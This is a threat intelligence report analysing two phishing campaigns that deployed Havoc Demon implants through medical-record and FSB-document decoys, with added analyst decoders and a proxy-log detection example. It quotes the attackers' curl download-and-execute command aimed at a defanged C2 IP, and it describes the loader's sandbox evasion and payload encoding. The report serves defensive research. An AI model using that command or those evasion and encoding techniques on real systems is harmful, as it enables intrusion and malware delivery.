Wreaking havoc in cyberspace: threat actors experiment with pentest tools
In recent months, adversaries have increasingly opted for the Havoc post‑exploitation framework, a tool less popular than Cobalt Strike, Metasploit, and Sliver. According to BI.ZONE Threat Intelligence, this C2 framework is chosen in an attempt to evade cybersecurity systems that may not flag an unknown program as malicious. The Mysterious Werewolf cluster took the same approach when it leveraged the Mythic framework in one of its campaigns.
In this research, we explore two campaigns based on the Havoc framework.
- Adversaries continue to seek alternatives to malware, frequently resorting to post‑exploitation frameworks.
- By using lesser‑known tools, attackers increase their chances of bypassing security systems.
- Phishing emails remain the most popular way of getting initial access as they provide a broader attack surface.
In July, BI.ZONE Threat Intelligence specialists discovered an archive Выписка амбулаторная Камильская.zip with the ISO file Документы Камильская.iso, which in turn contained the LNK file Камильская А. Г.lnk. The names of the archive and its contents suggested that they contained an outpatient medical record and related documents. Opening the LNK file triggered the execution of the following command:
cmd.exe /c curl hxxp://87.242.107[.]147/Vipiska.doc -o C:\Users\Public\Documents\Vipiska.doc && curl hxxp://87.242.107[.]147/OneDriveUpdater.exe -o C:\Users\Public\Downloads\OneDriveUpdater.exe && start /min /B C:\Users\Public\Downloads\OneDriveUpdater.exe && start /B C:\Users\Public\Documents\Vipiska.doc && taskkill /F /IM cmd.exe
The command performed the following actions:
- used cURL to download the decoy document from the server 87.242.107[.]147 and stored it in the compromised system as C:\Users\Public\Documents\Vipiska.doc
- used cURL to download OneDriveUpdater.exe from the server 87.242.107[.]147 and stored the executable in the compromised system as C:\Users\Public\Downloads\OneDriveUpdater.exe
- ran the downloaded OneDriveUpdater.exe
- opened the decoy Vipiska.doc
- terminated the cmd.exe process with the help of taskkill
The decoy was an outpatient medical record (fig. 1).
OneDriveUpdater.exe was a PE32 executable written in C# that served as a loader. The file contained an encrypted payload, which it decrypted and ran in memory. Although OneDriveUpdater.exe had a Microsoft OneDrive icon, the file did not have a digital signature.
To prepare and run the malicious payload, the loader used the following WinAPI functions:
- VirtualAllocExNuma to allocate a memory region for the malicious payload
- VirtualProtect to set/modify the protection options for memory regions
- CreateThread to create a thread for execution in the context of the running process
To obstruct analysis, the loader checked:
- code execution time: if the program “slept” less than 2.5 seconds out of 3 seconds (the set sleep value), it terminated
- name of the running process: if the name was other than OneDriveUpdater, the program terminated
The loader contained two types of encrypted malicious payload: x86 and x64. Decrypting the payload required a double XOR with 32‑byte keys.
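A point worth making about the double XOR: two repeating‑key XOR layers of the same length add nothing over a single layer, because they collapse to one 32‑byte key equal to key1 ^ key2, and a 32‑byte repeating key falls to a known‑plaintext check on the first 32 bytes of output. The block below is an added example of how an analyst would decrypt such a blob and verify that collapse; it is not the loader's code. The keys and the "payload" are constructed fixtures (the report does not publish the real ones), and `xor_repeating`, `effective_key` and `recover_key_from_known_prefix` are names chosen for this example.

```python
import hashlib
from itertools import cycle

# Constructed keys and payload (not the real ones, which the report does not publish).
KEY1 = bytes(range(32))                                        # 32-byte key, layer 1
KEY2 = hashlib.sha256(b"constructed key material").digest()    # 32-byte key, layer 2
SAMPLE_PAYLOAD = b"CONSTRUCTED-SAMPLE-PAYLOAD-NOT-SHELLCODE " * 3  # 123 bytes of harmless filler


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a key that repeats every len(key) bytes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def double_xor_decrypt(blob: bytes, key1: bytes, key2: bytes) -> bytes:
    """Undo the two XOR layers. XOR is self-inverse and commutative, so layer order is irrelevant."""
    return xor_repeating(xor_repeating(blob, key2), key1)


def effective_key(key1: bytes, key2: bytes) -> bytes:
    """Two repeating-key layers of equal length collapse to a single repeating key: key1 ^ key2."""
    if len(key1) != len(key2):
        raise ValueError("only equal-length keys collapse to a single repeating key")
    return bytes(a ^ b for a, b in zip(key1, key2))


def recover_key_from_known_prefix(blob: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery for repeating-key XOR: key = ciphertext ^ plaintext over one key period.

    For this loader one key period is 32 bytes, so 32 known plaintext bytes give the whole
    effective key, which then decrypts the rest of the blob.
    """
    return bytes(c ^ p for c, p in zip(blob, known_plaintext))


# Constructed "encrypted" fixture: the payload after both XOR layers.
SAMPLE_BLOB = xor_repeating(xor_repeating(SAMPLE_PAYLOAD, KEY1), KEY2)


if __name__ == "__main__":
    assert double_xor_decrypt(SAMPLE_BLOB, KEY1, KEY2) == SAMPLE_PAYLOAD
    single = effective_key(KEY1, KEY2)
    print("collapsed key:", single.hex())
    print("single-layer decrypt matches:", xor_repeating(SAMPLE_BLOB, single) == SAMPLE_PAYLOAD)
    recovered = recover_key_from_known_prefix(SAMPLE_BLOB, SAMPLE_PAYLOAD[:32])
    print("key recovered from 32 known bytes:", recovered == single)
```

In practice the known 32 bytes come from wherever the payload has a predictable prefix (a standard file header, or a prologue already seen in another sample); the decryptor then only needs the two keys' XOR, never the keys themselves.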
The malicious payload was a shellcode that launched a dynamic link library with the original name demon.x86.dll/demon.x64.dll. The library was a Demon implant of the Havoc framework. The implant’s configuration data is presented in table 1 below.
Parameter | Value |
---|---|
Process to be implanted with malicious payload | x86: "C:\Windows\SysWOW64\svchost.exe" x64: "C:\Windows\System32\svchost.exe" |
C2 server | 87.242.107[.]147:443 |
Server interaction method | POST |
Headers | User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" Content-type: */* Host: microsoftonline[.]com |
We also discovered a similar sample of OneDriveUpdater.exe (SHA‑256: 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569) with the identical PDB path. This loader also contained the Demon implant of the Havoc framework; in this case, 87.242.107[.]224 was used as the C2 server.
Our analysis of the C2 servers enabled us to find additional malicious files, as well as some previously unknown components of the C2 infrastructure (all the associated indicators of compromise are available on the BI.ZONE Threat Intelligence portal). The files included another decoy document, titled Medical.doc, that was a nearly exact copy of Vipiska.doc (fig. 2), which proved that the files had been created by the adversaries. Analysis of the metadata suggested that the attackers used data stolen from a medical research center.
In August, BI.ZONE Threat Intelligence specialists discovered a phishing email (fig. 3). A link in the body of the email led to hxxp://inforussia[.]org/dokumenty.html, a page that contained a malicious payload encoded in Base64 with 35 added to each byte of the Base64 output (fig. 4). Clicking the link caused the malicious payload to be saved in the compromised system as Dokumenty_FSB.exe. Written in C/C++, this PE32+ executable had a PDF icon and served as a loader. Its RCData resource contained a malicious payload encoded as IPv6 addresses separated by the characters 0D 0A (CR LF) and XOR encrypted with a key of 10,000 bytes. The loader decoded and decrypted the malicious payload in memory and then ran it in a new thread.
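Both encodings in this campaign are cheap to reverse once recognised, and an analyst typically scripts the reversal to pull the next stage out of the HTML page and out of the loader's resource. The block below is an added example of those two decoders, not code from the report or the loader: `decode_shifted_base64` undoes the "Base64 plus 35" smuggling and `decode_rcdata_payload` turns CRLF‑separated IPv6 addresses back into bytes and XORs them with the key. The fixtures are constructed (a fake "executable", a 48‑byte stage and a 16‑byte key instead of the real 10,000‑byte one; the decoder does not depend on key length), and the two underscore‑prefixed helpers exist only to build those fixtures.

```python
import base64
import ipaddress
from itertools import cycle

SHIFT = 35  # the report: Base64 output with 35 added to each byte

# Constructed fixtures (not the real files): a fake "executable", a 48-byte second stage
# (48 bytes = exactly three IPv6 addresses) and a short XOR key.
SAMPLE_EXE = b"MZ-CONSTRUCTED-SAMPLE-NOT-A-REAL-EXECUTABLE"
SAMPLE_STAGE2 = b"CONSTRUCTED SAMPLE STAGE-2 BLOB, NOT SHELLCODE!!"
SAMPLE_KEY = bytes(range(1, 17))


def decode_shifted_base64(text: str, shift: int = SHIFT) -> bytes:
    """Reverse the HTML-smuggling encoding: subtract the shift from every character, then base64-decode."""
    b64 = bytes(ord(ch) - shift for ch in text)
    return base64.b64decode(b64, validate=True)  # validate=True rejects anything that is not clean Base64


def decode_ipv6_lines(text: bytes) -> bytes:
    """Parse CRLF-separated IPv6 addresses back into the 16-byte chunks they encode."""
    out = bytearray()
    for line in text.split(b"\r\n"):
        line = line.strip()
        if line:
            # IPv6Address accepts any textual form (compressed, IPv4-mapped, ...) and .packed gives the 16 bytes
            out += ipaddress.IPv6Address(line.decode("ascii")).packed
    return bytes(out)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a key that repeats every len(key) bytes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_rcdata_payload(rcdata: bytes, key: bytes) -> bytes:
    """Full chain for the loader's resource: IPv6 text -> raw bytes -> XOR with the key."""
    return xor_repeating(decode_ipv6_lines(rcdata), key)


# --- fixture builders: used only to construct the sample inputs for this example ---
def _shifted_base64(data: bytes, shift: int = SHIFT) -> str:
    return "".join(chr(b + shift) for b in base64.b64encode(data))


def _as_ipv6_lines(data: bytes) -> bytes:
    if len(data) % 16:
        raise ValueError("fixture must be a multiple of 16 bytes")
    addrs = [str(ipaddress.IPv6Address(data[i:i + 16])) for i in range(0, len(data), 16)]
    return "\r\n".join(addrs).encode("ascii")


SMUGGLED_TEXT = _shifted_base64(SAMPLE_EXE)                           # what the HTML page would carry
RCDATA_BLOB = _as_ipv6_lines(xor_repeating(SAMPLE_STAGE2, SAMPLE_KEY))  # what the RCData resource would carry


if __name__ == "__main__":
    print("smuggled text starts with:", SMUGGLED_TEXT[:24])
    print("stage 1 recovered:", decode_shifted_base64(SMUGGLED_TEXT) == SAMPLE_EXE)
    print("RCData as stored:\n" + RCDATA_BLOB.decode("ascii"))
    print("stage 2 recovered:", decode_rcdata_payload(RCDATA_BLOB, SAMPLE_KEY) == SAMPLE_STAGE2)
```

For a real resource the key must first be located in the binary (a 10,000‑byte key is itself a conspicuous blob); once found, the same `decode_rcdata_payload` call applies unchanged.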
Similarly to the previous campaign, the malicious payload was a shellcode that launched a dynamic link library with the original name demon.x86.dll/demon.x64.dll. The library was a Demon implant of the Havoc framework. The implant’s configuration data is presented in table 2 below.
Parameter | Value |
---|---|
Process to be implanted with malicious payload | x86: "C:\Windows\SysWOW64\notepad.exe" x64: "C:\Windows\System32\notepad.exe" |
C2 server | 46.29.162[.]93:443 |
Server interaction method | POST |
Headers | User-Agent: "Mozilla/5.0 (Windows NT 10) AppleWebKit/432.36 (KHTML, like Gecko)" Content-type: */* |
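Tables 1 and 2 give a defender three things to hunt on in web proxy or EDR network telemetry: the exact User‑Agent strings of the two Demon profiles, a Host header (microsoftonline[.]com) that does not match the bare IP the implant actually connects to, and POST traffic originating from svchost.exe or notepad.exe, neither of which should be talking to an internet address on its own. The block below is an added example of that triage logic, not a BI.ZONE rule: it parses a constructed field=value proxy log (three made‑up lines, the first two modelled on the two campaigns, the third benign) and returns the findings per line. The log format, the field names and the finding names are assumptions of this example; the IPs and User‑Agent strings are the ones published in this report.

```python
import ipaddress
import re

# User-Agent strings from tables 1 and 2 of the report (the Demon implant's HTTP profiles).
DEMON_USER_AGENTS = {
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10) AppleWebKit/432.36 (KHTML, like Gecko)",
}
# C2 addresses from the report's indicators, refanged.
KNOWN_C2 = {"87.242.107.147", "87.242.107.224", "46.29.162.93"}
# Processes the implant was configured to be injected into; neither should POST to the internet.
INJECTION_HOSTS = {"svchost.exe", "notepad.exe"}

# Constructed proxy log (field=value; not a real product format). IPv4 destinations only.
SAMPLE_LOG = """\
src=10.0.0.12 dst=87.242.107.147:443 method=POST host=microsoftonline.com ua="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" proc=svchost.exe
src=10.0.0.31 dst=46.29.162.93:443 method=POST host=46.29.162.93 ua="Mozilla/5.0 (Windows NT 10) AppleWebKit/432.36 (KHTML, like Gecko)" proc=notepad.exe
src=10.0.0.31 dst=www.example.com:443 method=GET host=www.example.com ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0" proc=msedge.exe
"""

_FIELD = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_line(line: str) -> dict[str, str]:
    """Split one field=value line into a dict; quoted values (the User-Agent) may contain spaces."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2)) for m in _FIELD.finditer(line)}


def _is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def assess(fields: dict[str, str]) -> set[str]:
    """Apply the four checks derived from the implant configuration to one parsed request."""
    findings = set()
    dst_host = fields.get("dst", "").rsplit(":", 1)[0]  # strip the port (IPv4 or hostname only)
    host_hdr = fields.get("host", "")
    # 1. Connection goes to a bare IP while the Host header claims a domain (table 1's microsoftonline[.]com).
    if _is_ip(dst_host) and host_hdr and not _is_ip(host_hdr):
        findings.add("host_header_mismatch")
    # 2. Exact match on a published Demon User-Agent.
    if fields.get("ua") in DEMON_USER_AGENTS:
        findings.add("known_demon_user_agent")
    # 3. Destination is a published C2 address.
    if dst_host in KNOWN_C2:
        findings.add("known_c2_address")
    # 4. POST to a literal IP from a process that was chosen as an injection target.
    if fields.get("method") == "POST" and fields.get("proc", "").lower() in INJECTION_HOSTS and _is_ip(dst_host):
        findings.add("unexpected_network_process")
    return findings


def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Return (dst, sorted findings) for every line that triggered at least one check."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = parse_line(line)
        found = assess(fields)
        if found:
            hits.append((fields.get("dst", "?"), sorted(found)))
    return hits


if __name__ == "__main__":
    for dst, found in scan_log(SAMPLE_LOG):
        print(f"{dst}: {', '.join(found)}")
```

Checks 2 and 3 are brittle (a profile or server change defeats them), while checks 1 and 4 describe the technique rather than this sample and keep working when the indicators rotate; the example keeps all four so the output shows which kind fired.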
Выписка амбулаторная Камильская.zip
- MD5: d970b9e0f46675098dbdd3082565c1c0
- SHA-1: 7388f62e8da9cdbcac4f5bc6b0dc41ff8f0056a9
- SHA-256: 88f83a7394c61b0e05432572ccbbacd1878dad0602c5459f98f46c265e63d8c7

Документы Камильская.iso
- MD5: 3273fb8b07627d8bf5aa4d45aa817ba5
- SHA-1: 14a8c1f7dd2ec5ac1faa8050acbb2fcdf7b8ac8c
- SHA-256: 07ae355ebfafe21d81592b765053c48cf4a079d71b359b6a4d7f412b1dfb6374

Камильская А. Г.lnk
- MD5: ac043785536df294f73f89040d4fc767
- SHA-1: f0f6947cca25f01eda399a7fba1c23e11a0c3a15
- SHA-256: 48a579e8e48938f810fd6568e0d5c8ed6b3ec093f3c76a67f9c494224962a334

OneDriveUpdater.exe
- MD5: 31113f00145ab7d3773884f091407bed
- SHA-1: 061d2d06ce1cabde79ee392645c3568df36fdf17
- SHA-256: 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569

OneDriveUpdater.exe
- MD5: 14fa89384daab27b998d53efc1750a38
- SHA-1: 7f7313d8e9d18823a57ac7a329b9695f6fa7b962
- SHA-256: 7e3928a7f3300aedf261db5596cb7f2f6aac115240b010e25a3d53decde38fd0

dokumenty.html
- MD5: 8a21fe665d3f3a0e44f21e3381da067c
- SHA-1: ad6f413709c9e3af885233822a1aebd779bba7bc
- SHA-256: 7c2f59d9790b816cb6f27a796d7c928046519f7429b7d2bbe53c60a7a55e22a7

Dokumenty_FSB.exe
- MD5: f43dd2463e238ec7af4c63df87db6c73
- SHA-1: bb92e0ca7eda4b866af872a4552e4df42bb28aba
- SHA-256: ac301b7698ac040f219eb8dfb248595a406b075d91f51116ef60d4dd9f5242ad

Network indicators:
- hxxp://inforussia[.]org
- 87.242.107[.]147
- 87.242.107[.]224
- 46.29.162[.]93
Campaign No. 1

Tactic | Technique | Procedure |
---|---|---|
Execution | Command and Scripting Interpreter: PowerShell | Adversaries used malicious PowerShell scripts to execute the malicious payload in the memory of the running process |
Execution | Command and Scripting Interpreter: Windows Command Shell | Adversaries used |
Execution | User Execution: Malicious File | Adversaries used the malicious LNK file in the ISO archive to compromise the user |
Defense Evasion | Debugger Evasion | Adversaries used the loader to check the name of the running process. If the name was other than |
Defense Evasion | Deobfuscate/Decode Files or Information | Adversaries used the double XOR encrypted malicious payload which was decrypted by the loaders |
Defense Evasion | Obfuscated Files or Information: Embedded Payloads | Adversaries embedded the obfuscated payload in the loaders |
Defense Evasion | Obfuscated Files or Information: Encrypted/Encoded File | Adversaries encrypted the payload with a double XOR and embedded it in the body of the loaders |
Defense Evasion | Masquerading: Match Legitimate Name or Location | Adversaries used the name |
Defense Evasion | Reflective Code Loading | Adversaries reflectively loaded the malicious payload |
Defense Evasion | Virtualization/Sandbox Evasion: Time Based Evasion | Adversaries checked the time of code execution |
Discovery | Process Discovery | Adversaries got the name of the running process for later inspection |
Discovery | Virtualization/Sandbox Evasion: Time Based Evasion | Adversaries checked the time of code execution |
Command and Control | Application Layer Protocol: Web Protocols | Adversaries used POST requests as a way for the Demon loader implant to communicate with the C2 server |
Command and Control | Ingress Tool Transfer | Adversaries used cURL to download the malicious payload and the decoy document from the server |
Campaign No. 2

Tactic | Technique | Procedure |
---|---|---|
Initial Access | Phishing: Spearphishing Link | Adversaries sent out targeted phishing emails with a download link to the malicious program |
Execution | Command and Scripting Interpreter: JavaScript | Adversaries used the malicious obfuscated JS code hosted on an HTML page of their server |
Execution | User Execution: Malicious Link | Adversaries used malicious links for the user to download and run the malware |
Execution | User Execution: Malicious File | Adversaries used EXE files with Adobe Acrobat Reader icons to compromise the user |
Defense Evasion | Debugger Evasion | Adversaries used the loader to check the name of the running process. If the name was other than |
Defense Evasion | Deobfuscate/Decode Files or Information | Adversaries used the malicious payload encoded as IPv6 addresses separated by the characters |
Defense Evasion | Obfuscated Files or Information: HTML Smuggling | Adversaries implanted the malicious payload, which was an executable file, into HTML pages |
Defense Evasion | Obfuscated Files or Information: Dynamic API Resolution | Adversaries used their own algorithm to hash the names of the WinAPI functions being called |
Defense Evasion | Obfuscated Files or Information: Embedded Payloads | Adversaries embedded the obfuscated malicious payload in the loaders |
Defense Evasion | Obfuscated Files or Information: Encrypted/Encoded File | Adversaries employed XOR to encrypt the malicious payload. They coded it as IPv6 addresses separated by the characters |
Defense Evasion | Masquerading: Match Legitimate Name or Location | Adversaries used the name |
Command and Control | Application Layer Protocol: Web Protocols | Adversaries used POST requests as a way for the Demon loader implant to communicate with the C2 server |
Command and Control | Ingress Tool Transfer | Adversaries used the Havoc framework’s Demon implant, which was the next stage loader |
The examined malicious activity is detected by the following BI.ZONE EDR rules:
- win_access_to_ti_observed_host_from_nonbrowsers
- win_execution_of_ti_observed_file
- win_curl_download_and_execute_file
- win_kill_cmd_process
- win_suspicious_code_injection_to_system_process
- win_possible_parent_process_spoofing
Phishing emails are the most popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.
Studying the current attack methods and tools is important for mapping the cyber threat landscape. To stay aware of the latest campaigns and methods used in attacks against specific infrastructures, we recommend dedicated portals such as BI.ZONE Threat Intelligence. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect from the most critical threats to the company.